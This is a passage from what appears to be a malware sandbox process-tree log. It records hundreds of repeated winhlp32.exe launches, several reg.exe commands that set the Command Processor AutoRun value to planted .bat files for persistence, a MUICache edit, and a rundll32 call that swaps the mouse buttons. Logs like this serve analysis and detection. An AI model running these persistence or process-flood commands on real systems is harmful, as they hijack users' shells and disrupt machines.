        
        winhlp32
        7⤵
        
        PID:15420
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15432
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15448
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15464
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15472
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15484
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15496
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15516
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15528
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15560
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15592
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15608
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15624
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15636
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15648
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15660
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15672
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15688
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15704
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15716
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15728
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15740
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15760
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15772
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15784
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15796
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15808
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15820
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15836
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15844
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15856
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15872
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15888
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15896
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15908
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15924
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15936
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15948
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15960
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15972
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15980
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:15992
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16000
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16024
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16044
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16056
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16084
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16096
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16116
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16128
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16140
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16156
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16168
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16180
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16192
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16204
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16220
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16232
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16244
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16264
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16276
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16288
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16300
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16316
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16328
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16340
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16348
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16364
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16376
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:6180
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:6324
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:6156
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:6096
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16392
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16400
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16416
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16432
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16440
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16448
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16460
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16472
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16484
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16500
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16516
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16528
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16540
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16552
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16564
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16572
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16588
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16600
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16616
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16624
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16640
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16660
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16684
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16704
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16716
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16728
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16768
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16784
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16796
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16808
        
        C:\Windows\winhlp32.exe
        
        winhlp32
        7⤵
        
        PID:16820
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Bettercelery.bat" /f
        6⤵
        
        PID:8132
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        6⤵
        
        PID:1844
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Sakpot.bat" /f
        6⤵
        
        PID:8644
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
        6⤵
        Modifies registry key
        
        PID:9860
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Bettercelery.bat" /f
        5⤵
        
        PID:7372
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
        5⤵
        
        PID:7420
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Sakpot.bat" /f
        5⤵
        
        PID:7632
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
        5⤵
        Modifies registry key
        
        PID:7984
    - - C:\Windows\system32\rundll32.exe
        
        C:\Windows/system32/rundll32 user32, SwapMouseButton
        5⤵
        
        PID:8016
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\system32\batinit.bat" /f
        5⤵
        
        PID:8160
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:5808
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:8940
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9528
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9660
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9676
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9732
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9840
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9852
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9860
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9884
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9896
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9916
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9932
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:9948
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:10080
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:10124
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:10192
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:10204
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:10028
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:1772
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:436
    - - C:\Windows\winhlp32.exe
        
        winhlp32
        5⤵
        
        PID:10032
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Bettercelery.bat" /f
      4⤵
      PID:1020
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Windows64Driver.bat" /f
      4⤵
      PID:2716
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\system32\Sakpot.bat" /f
      4⤵
      PID:3044
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d Sakpot /F
      4⤵
      Modifies registry key
      PID:4988
  - - C:\Windows\system32\rundll32.exe
      C:\Windows/system32/rundll32 user32, SwapMouseButton
      4⤵
      PID:7540
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "C:\Windows\system32\batinit.bat" /f
      4⤵
      PID:7944
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:2256
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8828
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8928
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9032
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9056
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9368
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9376
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10052
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9236
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9768
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9812
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9760
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8124
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9788
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7428
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3084
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8128
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7236
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:2476
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3628
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9372
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8260
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:4716
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3600
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5268
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5452
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5456
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10060
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7780
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7576
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:2860
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9992
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5028
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7888
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:6984
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7092
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7144
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7628
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7908
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10120
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:1512
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5104
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:4548
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9940
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7188
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3312
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3076
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3008
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:4308
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10264
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10296
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10328
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10372
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10440
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10476
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10496
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10512
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10548
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10580
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10616
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10672
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10692
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10712
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10724
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10752
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10764
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10788
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10800
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10820
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10828
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10840
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:2088
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10160
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8684
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9952
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9564
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8592
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9368
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10196
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8544
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9824
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7240
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9948
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9904
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9376
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7236
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9768
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:2040
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10224
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9788
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:2484
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9360
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11272
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11332
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11344
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11356
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11404
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11420
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11468
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11488
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11524
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11560
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11576
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11584
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11596
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11608
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11756
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11948
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11968
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11984
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11992
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12004
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12012
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12024
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12036
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12064
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12092
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12136
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12192
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12220
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12228
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12236
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12268
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12280
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7004
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11960
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12300
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12316
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12336
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12352
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12364
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12424
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12528
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12536
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12572
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12580
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12592
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12612
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12620
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12632
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12668
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12680
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12688
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12804
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12820
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12836
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12848
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12860
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12872
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12920
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13156
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13212
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13256
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12020
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13220
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13184
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13208
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13640
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13680
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13692
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13704
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13728
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13752
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13776
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13784
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13792
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13800
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13808
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10148
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13516
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10220
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10456
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9220
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11072
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:8480
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10156
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9548
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9012
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10824
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12672
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:13152
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12740
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11036
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:1440
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12464
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9264
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12648
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12828
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12236
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:9856
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5316
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11668
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11888
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12204
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12012
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12652
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:11372
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3448
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:12132
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:5184
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:3160
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:7580
  - - C:\Windows\winhlp32.exe
      winhlp32
      4⤵
      PID:10656
  - - C:\Windows\winhlp32.exe
      winhlp32
